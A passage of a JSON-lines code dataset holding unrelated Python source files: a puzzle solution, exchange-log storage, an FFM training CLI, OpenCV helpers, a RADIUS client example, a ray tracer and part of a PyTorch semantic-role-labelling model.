Dog(1).Cat(99)\n\nprint(dog.age) # >>> 0\nprint(cat.age) # >>> 99\n\nprint(dog.say(\"Wooh\")) # >>> WOOH!! WOOH!! 
WOOH!!\nprint(dog.say(\"Meow\")) # >>> I want fish!\nprint(cat.meow()) # >>> I want fish!\n","sub_path":"SimpleLearnings/py_nested_class.py","file_name":"py_nested_class.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"613157561","text":"'''\n28분 걸림\n오랜만에 해서 좀 verbose한 답이긴 함\n'''\n\ndef solution(board, moves):\n # 행렬의 높이를 저장한다\n height = len(board)\n\n # 가로 인덱스 값 기반으로 행렬에서 맨 위의 값을 뽑아온다\n def pop_vertically(row_idx: int):\n for i in range(0, height):\n val = board[i][row_idx]\n\n # 0이 아닌 값을 찾으면\n if val != 0:\n # 그 자리를 0으로 채우고\n board[i][row_idx] = 0\n # 그 값을 가져온다\n return val\n\n # 결과 바구니\n result = []\n # 터진 인형 갯수 (+2씩 됨)\n answer = 0\n\n # 바구니에 채운다\n def push_result(val: int):\n answer = 0\n\n # debug\n # print('start', result, val)\n \n # 빈 바구니가 아니면\n if len(result) != 0:\n # 바구니 맨 위랑 겹치나 확인\n if val == result[-1]:\n\n # 겹치면 넣지않고, 이미 있는걸 뺀다\n result.pop()\n\n\n # 터진 인형 갯수 +2\n answer = 2\n # 안 겹치면\n else:\n # 바로 넣는다\n result.append(val)\n # 빈 바구니면\n else:\n # 바로 넣는다\n result.append(val)\n \n # debug\n # print('end', result, val)\n\n return answer\n \n\n # moves 따라 실행함\n for move in moves:\n # debug\n # print('move:', move)\n\n val = pop_vertically(move - 1) # 인덱스 1부터 시작하니까\n if val != None:\n answer += push_result(val)\n\n return answer","sub_path":"Programmers/2019카카오겨울인턴십/크레인인형뽑기.py","file_name":"크레인인형뽑기.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"299103806","text":"import time\nimport json\nimport os\n\n\n\ndb = {}\n\n\ndef initialize(exchange):\n if exchange == \"COIN-BS\":\n with open(os.path.join(os.path.dirname(__file__),\"CB_db.json\"),'r') as data_file:\n global db\n db = json.load(data_file)\n elif exchange == \"KRK\":\n with open(os.path.join(os.path.dirname(__file__),\"KN_db.json\"),'r') as data_file:\n global db\n db = json.load(data_file)\n elif exchange == 'ITBT':\n with open(os.path.join(os.path.dirname(__file__),\"ITBT_db.json\"),'r') as data_file:\n global db\n db = json.load(data_file)\n\n\n\n\ndef newDateLog(log_type):\n global db\n monthdayyear = time.strftime(\"%m/%d/%Y\")\n db[log_type][monthdayyear] = {}\n\n\ndef getBLKLogs():\n logs = db['BLK_CHN']['logs']\n return logs\n\ndef getCOINBSLogs():\n logs = db['COIN_BS']['logs']\n return logs\n\ndef getOKCLogs():\n logs = db['OKC']['logs']\n return logs\n\ndef getBLKSnapshots():\n snaps = db['BLK_CHN']['snapshots']\n return snaps\n\ndef getCOINBSSnapshots():\n snaps = db['COIN_BS']['snapshots']\n return snaps\n\ndef getOKCSnapshots():\n snaps = db['OKC']['snapshots']\n return snaps\n\n\ndef writeOut(exchange):\n global db\n if exchange == \"COIN-BS\":\n with open(os.path.join(os.path.dirname(__file__),\"CB_db.json\"),'w') as data_file:\n data_file.write(json.dumps(db, indent=4, sort_keys=True))\n print('written')\n elif exchange == \"KRK\":\n with open(os.path.join(os.path.dirname(__file__),\"KN_db.json\"),'w') as data_file:\n data_file.write(json.dumps(db, indent=4, sort_keys=True))\n print('written')\n elif exchange == \"ITBT\":\n with open(os.path.join(os.path.dirname(__file__),\"ITBT_db.json\"),'w') as data_file:\n data_file.write(json.dumps(db, indent=4, sort_keys=True))\n print('written')\n\n\n\n # with open(os.path.join(os.path.dirname(__file__),\"db.json\"),'w') as jsonFile:\n # #print(json.dumps(db, indent=4, sort_keys=True))\n # jsonFile.write(json.dumps(db, indent=4, sort_keys=True))\n # 
print('written')\n\n","sub_path":"bitmon/DB/db_controller.py","file_name":"db_controller.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"426997697","text":"import logging\nfrom click import group, command, option, argument, echo, File, Path\nfrom ffm import FFMEstimator, read_libffm\n\n\n@group(context_settings={\n 'help_option_names': ['-h', '--help'],\n 'max_content_width': 120,\n})\n@option('-q', '--quiet', 'log_level', flag_value=logging.WARN)\n@option('-v', '--verbose', 'log_level', flag_value=logging.DEBUG, default=True)\ndef cli(log_level):\n logging.basicConfig(level=log_level, format='%(message)s')\n\n\n@cli.command()\n@argument('training_file', type=Path(exists=True, dir_okay=False))\n@argument('model_file', required=False, type=Path(writable=True, dir_okay=False))\n@option('-l', '--lambda', type=float, default=0.00002,\n help='Regularization parameter')\n@option('-k', '--factors', type=int, default=4,\n help='Number of latent factors')\n@option('-r', '--eta', type=float, default=0.2,\n help='Learning rate')\n@option('-t', '--iterations', type=int, default=15,\n help='Number of iterations')\n@option('-p', '--validation-file', type=Path(exists=True, dir_okay=False),\n help='Path to validation set')\n@option('-a', '--auto-stop', type=int, default=0, metavar='N',\n help='Keep iterating at most times without achieving a better validation score')\n@option('--scorer', default='neg_log_loss',\n help='Metric to use for evaluating performance on validation set. '\n 'It can be any predefined sklearn scoring metric '\n '(http://scikit-learn.org/stable/modules/model_evaluation.html)')\n@option('-s', '--threads', type=int, default=1,\n help='Number of threads')\n@option('--norm/--no-norm', default=True,\n help='enable/disable instance-wise normalization')\n@option('--rand/--no-rand', default=True,\n help='enable/disable randomization')\n@option('--bin/--no-bin', default=True,\n help='enable/disable binary file generation from training/validation files')\ndef train(training_file, validation_file, **kwargs):\n \"\"\"Train a FFM model\"\"\"\n model = FFMEstimator(\n lam=kwargs['lambda'],\n k=kwargs['factors'],\n eta=kwargs['eta'],\n nr_iters=kwargs['iterations'],\n auto_stop=kwargs['auto_stop'],\n scorer=kwargs['scorer'],\n nr_threads=kwargs['threads'],\n normalization=kwargs['norm'],\n randomization=kwargs['rand'],\n )\n if kwargs['bin']:\n model.fit_from_file(training_file, validation_file)\n else:\n train_X, train_y = read_libffm(training_file)\n val_X_y = read_libffm(validation_file) if validation_file else None\n model.fit(train_X, train_y, val_X_y)\n model.save_model(kwargs['model_file'] or training_file + '.model')\n\n\n@cli.command()\n@argument('test_file', type=Path(exists=True, dir_okay=False))\n@argument('model_file', type=Path(exists=True, dir_okay=False))\n@argument('output_file', type=File('w'), required=False)\ndef predict(test_file, model_file, output_file):\n \"\"\"Use a trained FFM model to make predictions\"\"\"\n model = FFMEstimator().read_model(model_file)\n test_X, test_y = read_libffm(test_file)\n test_score = abs(model.scorer(model, test_X, test_y))\n echo(\"{} = {:.5g}\".format(model.score, test_score))\n if output_file:\n for p in model.predict_proba(test_X):\n output_file.write('{:.6g}\\n'.format(p))\n\n\nif __name__ == '__main__':\n 
cli()\n","sub_path":"ffm/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"419739221","text":"import cv2\nimport math\n###\n\n###\ndef dimensions_match(contour, vertices, range, desired_ratio):\n peri = cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, 0.04 * peri, True)\n # print(len(approx))\n # if\n if vertices - range <= len(approx) <= vertices + range:\n # compute the bounding box of the contour and use the\n # bounding box to compute the aspect ratio\n (x, y, w, h) = cv2.boundingRect(approx)\n # print(w)\n # print(h)\n if (desired_ratio < 1 and w > h) or (desired_ratio > 1 and h > w):\n temp = w\n w = h\n h = temp\n MIN_RATIO = desired_ratio * 0.60\n MAX_RATIO = desired_ratio * 1.4\n #MIN_RATIO = desired_ratio * 0.6\n #MAX_RATIO = desired_ratio * 1.4\n\n ar = w / float(h)\n # print(ar)\n #\n if MIN_RATIO <= ar <= MAX_RATIO:\n return True\n\n return False\n\n\ndef find_vertices(contour):\n peri = cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, 0.04 * peri, True)\n return len(approx)\n\n\ndef get_angle(camera, x, y):\n\n a = float(abs(camera.FRAME_WIDTH / 2 - x))\n b = float(camera.FRAME_HEIGHT - y)\n\n if b == 0:\n return 0\n\n radians = math.atan(a / b)\n angle = radians * 180 / math.pi\n return angle\n\n\ndef get_distance(width_pixel, width_actual, focal_length):\n return focal_length * width_actual / width_pixel\n\ndef distance_in_inches(width_pixel):\n return 762 * (width_pixel ** -0.8)\n\ndef distance_in_inches_long(width_pixel):\n return 34618 * (width_pixel ** -1.06)\n","sub_path":"processing/shape_util.py","file_name":"shape_util.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250066501","text":"# write a function that checks if a variable passed is a palindrome or not \n# what a palindrome is/not \n# input\n# output\n# l = [1, 2, 3]\n# s = \"test string\"\n# l[::]\nimport re\ndef is_palindrome(string):\n if type(string) != str:\n return False\n string = string.upper()\n string1 = re.sub(\"\\W+\",\"\", string)\n string2 = string1[::-1]\n if string1 == string2:\n return True\n else:\n return False\nprint(is_palindrome(\"1A Toyota's a Toyota1\"))","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"535070825","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 14 15:46:24 2016\n\n@author: ericdargan\n\"\"\"\n\n#Extra-Credit\n\ndef encoder(normal):\n encoded = []\n let = normal[0]\n count = 0\n \n for spot in range(len(normal)):\n \n if(let == normal[spot]):\n count += 1\n else:\n \n encoded.append([let,count])\n let = normal[spot]\n count = 1\n\n encoded.append([let,count])\n \n return str(encoded)\n \n\n \ndef decoder(encoded):\n decoded = encoded[1:len(encoded)-1]\n decoded = decoded.replace(\" \",\"\")\n decoded = decoded.split(\"],[\")\n decoded[0] = decoded[0].replace(\"[\",\"\")\n decoded[len(decoded) - 1] = decoded[len(decoded) - 1].replace(\"]\",\"\")\n \n for num in range(len(decoded)):\n decoded[num] = decoded[num].replace(\"'\",\"\")\n \n new_decoded = []\n for num in range(len(decoded)):\n new_decoded.append(decoded[num].split(\",\"))\n \n decoded = \"\"\n \n for num in range(len(new_decoded)):\n #decoded += new_decoded[num][0] * new_decoded[num][1]\n 
new_decoded[num][0] = new_decoded[num][0] * int(new_decoded[num][1])\n decoded += new_decoded[num][0]\n \n return decoded\n \ndef main():\n string = input(\"Please enter a string with many repeating characters: \")\n encoded = encoder(string)\n print(\"Encoded: \", encoded)\n print(\"Decoded: \", decoder(encoded))\n \nmain()\n ","sub_path":"ed1592_hw7_q7.py","file_name":"ed1592_hw7_q7.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"313655818","text":"#!/usr/bin/env python3\n\nimport asyncio\nimport logging\nimport traceback\n\nfrom os import path\n\nfrom pyrad.client_async import ClientAsync\nfrom pyrad.dictionary import Dictionary\nfrom pyrad.packet import PacketCode\n\nlogging.basicConfig(level='DEBUG',\n format='%(asctime)s [%(levelname)-8s] %(message)s')\n\n\ndef create_request(client, user):\n return client.create_auth_packet(**{\n 'User-Name': user,\n 'NAS-IP-Address': '192.168.1.10',\n 'NAS-Port': 0,\n 'Service-Type': 'Login-User',\n 'NAS-Identifier': 'trillian',\n 'Called-Station-Id': '00-04-5F-00-0F-D1',\n 'Calling-Station-Id': '00-01-24-80-B3-9C',\n 'Framed-IP-Address': '10.0.0.100',\n })\n\n\ndef print_reply(reply):\n if reply.code == PacketCode.ACCESS_ACCEPT:\n print('Access accepted')\n else:\n print('Access denied')\n\n print('Attributes returned by server:')\n for i in reply.keys():\n print(\"%s: %s\" % (i, reply[i]))\n\n\ndef initialize_transport(loop, client):\n loop.run_until_complete(\n asyncio.ensure_future(\n client.initialize_transports(enable_auth=True,\n local_addr='127.0.0.1',\n local_auth_port=8000,\n enable_acct=True,\n enable_coa=True)))\n\n\ndef main(path_to_dictionary):\n client = ClientAsync(server='localhost',\n secret=b'Kah3choteereethiejeimaeziecumi',\n timeout=4,\n dict=Dictionary(path_to_dictionary))\n\n loop = asyncio.get_event_loop()\n\n try:\n # Initialize transports\n initialize_transport(loop, client)\n\n requests = []\n for i in range(255):\n req = create_request(client, f'user{i}')\n future = client.send_packet(req)\n requests.append(future)\n\n # Send auth requests asynchronously to the server\n loop.run_until_complete(asyncio.ensure_future(\n asyncio.gather(\n *requests,\n return_exceptions=True\n )\n\n ))\n\n for future in requests:\n if future.exception():\n print('EXCEPTION ', future.exception())\n else:\n reply = future.result()\n print_reply(reply)\n\n # Close transports\n loop.run_until_complete(asyncio.ensure_future(\n client.deinitialize_transports()))\n print('END')\n except Exception as exc:\n print('Error: ', exc)\n traceback.print_exc()\n\n # Close transports\n loop.run_until_complete(asyncio.ensure_future(\n client.deinitialize_transports()))\n\n loop.close()\n\n\nif __name__ == '__main__':\n dictionary = path.join(path.dirname(path.abspath(__file__)), 'dictionary')\n main(dictionary)\n","sub_path":"example/auth_async.py","file_name":"auth_async.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453421424","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\n#------------------------------INITIALIZE---------------------------\n\nwidth = 1000\nheight = 1000\n\nmax_depth = 3\n\ncamera = np.array([0, 0, 0])\n\n# screen (-50,-50,100) -> (50,50,100)\n# left, top, right, bottom\nscreen = (-50, 50, 50, -50) \n\n#light position and color define\nlight = { 'position': np.array([500, 500, 500]), 'ambient': 
np.array([1, 1, 1]), 'diffuse': np.array([1, 1, 1])}\n\nshadow_constant = 0.1\n\nobjects = []\n\n\n\n#-------------------------------FUNCTIONS-------------------------------\n\ndef create_sphere(N):\n objectList = []\n\n rgb_list = []\n for i in range(N):\n\n r1, g1, b1 = input(\"color of sphere \"+str(i+1)+\": (R,G,B)= \").replace('(', ' ').replace(')', ' ').split(',')\n \n r = float(r1) / 255.0 \n g = float(g1) / 255.0 \n b = float(b1) / 255.0\n\n rgb_list.append(np.array([r, g, b]))\n\n xyz_list = []\n radius_list = []\n for i in range(N):\n\n test = True\n while test:\n \n x1, y1, z1 = input(\"Position (x,y,z) of sphere \"+str(i+1)+\": \").replace('(', ' ').replace(')', ' ').split(',')\n\n x = float(x1)\n y = float(y1)\n z = float(z1)\n\n if z > 200 and z < 1000 and abs(x) < z/2 and abs(y) < z/2:\n test = False\n xyz_list.append(np.array([x, y, z]))\n else:\n print(\"z must be between 200 and 1000\")\n print(\"x and y must be smaller than z/2\")\n\n \n\n rad1 = input(\"Radius of sphere \" + str(i+1)+\": \")\n rad = float(rad1)\n radius_list.append(rad)\n\n for i in range(N): \n \n createdObject = {'center': xyz_list[i], 'radius': radius_list[i], 'ambient': rgb_list[i], 'diffuse': rgb_list[i], 'reflection': 1 }\n objectList.append(createdObject)\n \n return objectList\n\ndef normalVector(vector):\n normal = vector / np.linalg.norm(vector)\n return normal\n\ndef reflectionVector(vector, normal):\n reflect = vector - 2 * np.dot(vector, normal) * normal\n return reflect\n\ndef intersectionSphere(center, radius, ray_origin, ray_direction):\n b = 2 * np.dot(ray_direction, ray_origin - center)\n c = np.linalg.norm(ray_origin - center) ** 2 - radius ** 2\n a = 1.0\n delta = b ** 2 - 4 * a * c\n if delta > 0:\n root1 = (-b + np.sqrt(delta)) / 2\n root2 = (-b - np.sqrt(delta)) / 2\n if root1 > 0 and root2 > 0:\n return min(root1, root2)\n return None\n\ndef nearest_intersected_object(objects, ray_origin, ray_direction):\n distances = [intersectionSphere(obj['center'], obj['radius'], ray_origin, ray_direction) for obj in objects]\n nearestObject = None\n min_dist = np.inf\n for index, distance in enumerate(distances):\n if distance and distance < min_dist:\n min_dist = distance\n nearestObject = objects[index]\n return nearestObject, min_dist\n\n\n\ndef illumination_calculator(nearestObject, light_intersection, normal_to_surface):\n\n illumination = np.zeros((3))\n ambient_color = nearestObject['ambient'] * light['ambient']\n diffuse_color= nearestObject['diffuse'] * light['diffuse'] * np.dot(light_intersection, normal_to_surface)\n illumination = ambient_color + diffuse_color\n \n return illumination\n\n\ndef cast_ray(direction, color, depth, origin, reflection):\n\n nearestObject, min_dist = nearest_intersected_object(objects, origin, direction)\n if nearestObject is None:\n return color / depth \n\n intersection = origin + min_dist * direction\n normal_to_surface = normalVector(intersection - nearestObject['center'])\n tricky_point = intersection + 1e-5 * normal_to_surface # 1e - 5 = 10 ^ -5 (that is eligible value)\n light_intersection = normalVector(light['position'] - tricky_point) # tricky_point -> to don't find same sphere when nearest point, that was common method for it.\n\n _, min_dist = nearest_intersected_object(objects, tricky_point, light_intersection)\n light_intersection_distance = np.linalg.norm(light['position'] - intersection)\n is_shadowed = min_dist < light_intersection_distance\n\n if is_shadowed:\n return color / depth \n\n illumination = 
illumination_calculator(nearestObject, light_intersection, normal_to_surface)\n    # accumulate this bounce's contribution, attenuated by the running reflection factor\n    color += reflection * illumination\n    reflection *= nearestObject['reflection']\n\n    # bounce: continue the ray from the offset intersection point\n    origin = tricky_point\n\n    direction = reflectionVector(direction, normal_to_surface)\n\n    if depth <= max_depth:\n        return cast_ray(direction, color, depth+1, origin, reflection)\n    else:\n        return color / depth\n\n#--------------------------------MAIN----------------------------------\n\nprint(\"Number of spheres: \")\nN = int(input())\n\nobjects = create_sphere(N)\n# a huge sphere far below the scene acts as the ground plane\nplane = { 'center': np.array([0, -50000, 0]), 'radius': 50000 - 400, 'ambient': np.array([0.5, 0.5, 0.5]), 'diffuse': np.array([0.7, 0.7, 0.7]), 'reflection': 1 }\n\nobjects.append(plane)\n\nimage = np.zeros((height, width, 3))\nfor i, y in enumerate(np.linspace(screen[1], screen[3], height)):\n    for j, x in enumerate(np.linspace(screen[0], screen[2], width)):\n        # center of screen is on (0, 0, 100)\n        pixel = np.array([x, y, 100])\n        origin = camera\n        direction = normalVector(pixel - origin)\n\n        color = np.zeros((3))\n        reflection = 1\n        current_depth = 1\n\n        color = cast_ray(direction, color, current_depth, origin, reflection)\n        image[i, j] = np.clip(color, 0, 1)\n\nplt.imsave('shadow_balls.png', image)\n\n\nwith Image.open('shadow_balls.png') as img:\n    img.show()","sub_path":"CMPE 460/Assignment2/assignment/assignment2.py","file_name":"assignment2.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"269669382","text":"\"\"\"\r\n71\r\nWith a single Python statement, print the value of the expression\r\n-0.7e+4.07 to the screen n times, each occurrence separated by\r\nthe @ character.\r\n\"\"\"\r\n\r\nn = int(input())\r\nco = -0.7 * pow(10, 4.07) # could this be written more cleanly?\r\nznak = '@'\r\n\r\nprint((str(co)+znak) * (n-1) + str(co) if (n > 0) else \"\")\r\n","sub_path":"JS/71.py","file_name":"71.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"180446851","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\tests\\utils.py\n# Compiled at: 2020-04-20 03:12:39\n# Size of source mod 2**32: 597 bytes\nimport json\nfrom jnius import autoclass\n\ndef load_java_tp(tp_json):\n    \"\"\"Just used for testing, users won't need this.\"\"\"\n    string_java = autoclass('java.lang.String')\n    java_transform_process = autoclass('org.datavec.api.transform.TransformProcess')\n    java_transform_process.fromJson(string_java(tp_json))\n\n\ndef inference_from_json(as_json):\n    string_java = autoclass('java.lang.String')\n    inference_configuration_java = autoclass('ai.konduit.serving.InferenceConfiguration')\n    inference_configuration_java.fromJson(string_java(json.dumps(as_json)))","sub_path":"pycfiles/konduit-0.1.5-py3.7/utils.cpython-37.py","file_name":"utils.cpython-37.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"507962287","text":"import torch\nimport torch.nn.init as init\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport copy\nfrom driver.HighWayLSTM import Highway_Concat_BiLSTM\nfrom 
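A one-liner alternative for JS/71.py above, answering its "could this be written more cleanly?" comment: str.join already handles repeat-with-separator printing, and joining an empty list reproduces the n <= 0 behaviour. A minimal sketch assuming the same n and expression:

n = int(input())
value = -0.7 * 10 ** 4.07
# join n copies of the value with '@'; for n <= 0 this prints an empty string
print('@'.join([str(value)] * n))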
data.Embedding import load_predtrained_emb_zero, load_predtrained_emb_avg\n\ndef initializer_1d(input_tensor, initializer):\n assert len(input_tensor.size()) == 1\n input_tensor = input_tensor.view(-1, 1)\n input_tensor = initializer(input_tensor)\n return input_tensor.view(-1)\n\nclass SRLModel(nn.Module):\n def __init__(self, alphabet_dic, config, use_cuda):\n super(SRLModel, self).__init__()\n self.config = config\n self.srl_labels = alphabet_dic['srl_labels_dic']\n self.word_num = alphabet_dic['word_alphabet'].m_size\n self.word_string2id = alphabet_dic['word_alphabet'].string2id\n self.char_num = len(alphabet_dic['char_alphabet'].keys())\n self.use_cuda = use_cuda\n self.use_char = False\n self.word_embed_dim = config.word_embed_dim + config.srl_hidden_weight_output_size\n self.contextualization_size = config.contextualization_size + config.srl_hidden_weight_output_size\n self.contextualization_layers = config.contextualization_layers\n\n self.context_embeddings = nn.Embedding(self.word_num, config.word_embed_dim)\n nn.init.xavier_uniform_(self.context_embeddings.weight.data)\n self.head_embeddings = nn.Embedding(self.word_num, config.word_embed_dim)\n nn.init.xavier_uniform_(self.head_embeddings.weight.data)\n self.char_embedding = nn.Embedding(self.char_num, config.char_embedding_size)\n nn.init.xavier_uniform_(self.char_embedding.weight.data)\n self.span_width_embeddings = nn.Embedding(config.max_arg_width, config.feature_size)\n nn.init.xavier_uniform_(self.span_width_embeddings.weight.data)\n\n if config.context_embedding_path != '':\n embedding = load_predtrained_emb_zero(config.context_embedding_path, self.word_string2id)\n self.context_embeddings.weight.data.copy_(embedding)\n self.context_embeddings.weight.requires_grad = False\n if config.head_embedding_path != '':\n embedding = load_predtrained_emb_zero(config.head_embedding_path, self.word_string2id)\n self.head_embeddings.weight.data.copy_(embedding)\n self.head_embeddings.weight.requires_grad = False\n\n cnn_output_size = len(config.filter_widths) * config.filter_size\n lstm_input_size = self.word_embed_dim + cnn_output_size\n # self.lstmlist = nn.ModuleList(\n # [nn.LSTM(\n # input_size=lstm_input_size,\n # hidden_size=self.contextualization_size,\n # num_layers=1,\n # bidirectional=True,\n # batch_first=True)\n # for _ in range(self.contextualization_layers)]\n # )\n self.bilstm = Highway_Concat_BiLSTM(\n input_size=lstm_input_size,\n hidden_size=self.contextualization_size, # // 2 for MyLSTM\n num_layers=self.contextualization_layers,\n batch_first=True,\n bidirectional=True,\n dropout_in=0,\n dropout_out=config.lstm_dropout_rate\n )\n\n self.convs = nn.ModuleList(\n [nn.Conv2d(1, config.filter_size, (K, config.char_embedding_size), stride=1, padding=(K // 2, 0)) for K in\n config.filter_widths])\n\n # highway\n self.gate_linear = nn.Linear(lstm_input_size, lstm_input_size, bias=True)\n self.transform_linear = nn.Linear(self.contextualization_size*2, lstm_input_size)\n\n # ffnn output linear\n self.output_linear = nn.Linear(self.contextualization_size*2, config.num_attention_heads, bias=True)\n # 1\n self.linear0 = nn.Linear(self.contextualization_size*4+lstm_input_size+config.feature_size, config.ffnn_size, bias=True)\n self.linear1 = nn.Linear(config.ffnn_size, config.ffnn_size, bias=True)\n self.output_linear1 = nn.Linear(config.ffnn_size, config.num_attention_heads, bias=True)\n # predicate\n # SRL\n # self.linear2 = nn.Linear(self.contextualization_size*2, config.ffnn_size, bias=True)\n # ORL\n self.linear2 = 
nn.Linear(self.contextualization_size*4+lstm_input_size+config.feature_size, config.ffnn_size, bias=True)\n self.linear3 = nn.Linear(config.ffnn_size, config.ffnn_size, bias=True)\n self.output_linear2 = nn.Linear(config.ffnn_size, config.num_attention_heads, bias=True)\n\n # 3\n self.linear4 = nn.Linear(2*(self.contextualization_size*4+lstm_input_size+config.feature_size), config.ffnn_size, bias=True)\n self.linear5 = nn.Linear(config.ffnn_size, config.ffnn_size, bias=True)\n self.output_linear3 = nn.Linear(config.ffnn_size, len(self.srl_labels)-1, bias=True)\n\n self.dropout = nn.Dropout(config.dropout_rate)\n self.lexical_dropout = nn.Dropout(config.lexical_dropout_rate)\n self.lstm_dropout = nn.Dropout(config.lstm_dropout_rate)\n\n self.srl_hidden_weight = nn.Parameter(torch.FloatTensor(config.srl_hidden_weight_input_size, config.srl_hidden_weight_output_size), requires_grad=True)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n for layer in self.convs:\n init.xavier_uniform_(layer.weight)\n initializer_1d(layer.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.gate_linear.weight)\n initializer_1d(self.gate_linear.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.transform_linear.weight)\n\n init.xavier_uniform_(self.output_linear.weight)\n initializer_1d(self.output_linear.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear0.weight)\n initializer_1d(self.linear0.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear1.weight)\n initializer_1d(self.linear1.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.output_linear1.weight)\n initializer_1d(self.output_linear1.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear2.weight)\n initializer_1d(self.linear2.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear3.weight)\n initializer_1d(self.linear3.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.output_linear2.weight)\n initializer_1d(self.output_linear2.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear4.weight)\n initializer_1d(self.linear4.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.linear5.weight)\n initializer_1d(self.linear5.bias, init.xavier_uniform_)\n\n init.xavier_uniform_(self.output_linear3.weight)\n initializer_1d(self.output_linear3.bias, init.xavier_uniform_)\n\n\n def forward(self, word_id_tensor, char_id_tensor, length_list, info_dic, srl_hiddens):\n length_tensor = torch.LongTensor(length_list)\n if self.use_cuda:\n length_tensor = length_tensor.cuda()\n context_word_emb = self.context_embeddings(word_id_tensor)\n head_word_emb = self.context_embeddings(word_id_tensor)\n\n srl_hidden = torch.bmm(srl_hiddens, self.srl_hidden_weight.expand(length_tensor.size(0), self.srl_hidden_weight.size(0), -1))\n context_word_emb = torch.cat((context_word_emb, srl_hidden), dim=-1)\n head_word_emb = torch.cat((head_word_emb, srl_hidden), dim=-1)\n\n context_emb, head_emb = self.getEmbeddings(char_id_tensor, context_word_emb, head_word_emb)\n\n # context_outputs = self.highwayLSTM(context_emb, length_list)\n # xqr highwaylstm\n masks = self.init_masks(len(length_list), length_tensor)\n context_outputs, _ = self.bilstm(context_emb, masks)\n ###\n # [sent_num, max_arg_width, max_len] ...\n candidate_starts, candidate_ends, candidate_mask = self.getSpanCandidates(length_tensor, self.config.max_arg_width)\n candidate_mask_shape = candidate_mask.size()\n # [sent_num, max_arg_width * max_len]\n flat_candidate_mask = candidate_mask.view(candidate_mask_shape[0], -1)\n\n cumsum 
= torch.cumsum(length_tensor, dim=0) # [sent_num]\n zeros = torch.zeros(1).long()\n if self.use_cuda:\n zeros = zeros.cuda()\n cumsum = torch.cat((zeros, cumsum[:-1]), 0) # [sent_num]\n batch_word_offset = torch.unsqueeze(cumsum, 1) # [sent_num, 1]\n # [num of total batch words]\n flat_candidate_starts = torch.masked_select(candidate_starts + batch_word_offset, flat_candidate_mask)\n flat_candidate_ends = torch.masked_select(candidate_ends + batch_word_offset, flat_candidate_mask)\n # [sent_num, max_len]\n text_len_mask = self.sequence_mask(length_tensor, int(max(length_tensor).item()))\n\n flat_context_outputs = self.flatten_emb_by_sentence(context_outputs, text_len_mask) # [num of total batch words, emb]\n flat_head_emb = self.flatten_emb_by_sentence(head_emb, text_len_mask) # [num of total batch words, emb]\n\n candidate_span_emb, head_scores, span_head_emb, head_indices, head_indices_log_mask = self.getSpanEmb(\n flat_head_emb, flat_context_outputs, flat_candidate_starts, flat_candidate_ends,\n ) # [num_candidates, emb], [num_candidates, max_span_width, emb], [num_candidates, max_span_width]\n\n # sparse_to_dense\n num_candidates = self.shape(candidate_span_emb, 0)\n max_num_candidates_per_sentence = self.shape(candidate_mask, 1)\n candidate_ids = torch.arange(0, num_candidates).long()\n # [num_sentences, max_num_candidates]\n # candidate_span_id = self.getSpanIds(candidate_mask, candidate_ids).long()\n\n # xqr code\n sparse_indices = (candidate_mask == 1).nonzero()\n sparse_values = torch.arange(0, num_candidates)\n if self.use_cuda:\n sparse_values = sparse_values.cuda()\n candidate_span_ids = torch.sparse.FloatTensor(sparse_indices.t(), sparse_values,\n torch.Size([len(length_list),\n max_num_candidates_per_sentence])).to_dense()\n candidate_span_ids = candidate_span_ids.long()\n ###\n\n spans_log_mask = torch.log(candidate_mask.float()) # [num_sentences, max_num_candidates]\n\n # Compute SRL representation.\n # [num_candidates,]\n flat_candidate_arg_scores = self.get_unary_scores(candidate_span_emb, self.dropout, 1)\n # [num_sents, max_num_candidates]\n # candidate_arg_score = self.getSpanIds(candidate_mask, flat_candidate_arg_scores) + spans_log_mask\n # xqr\n candidate_arg_scores 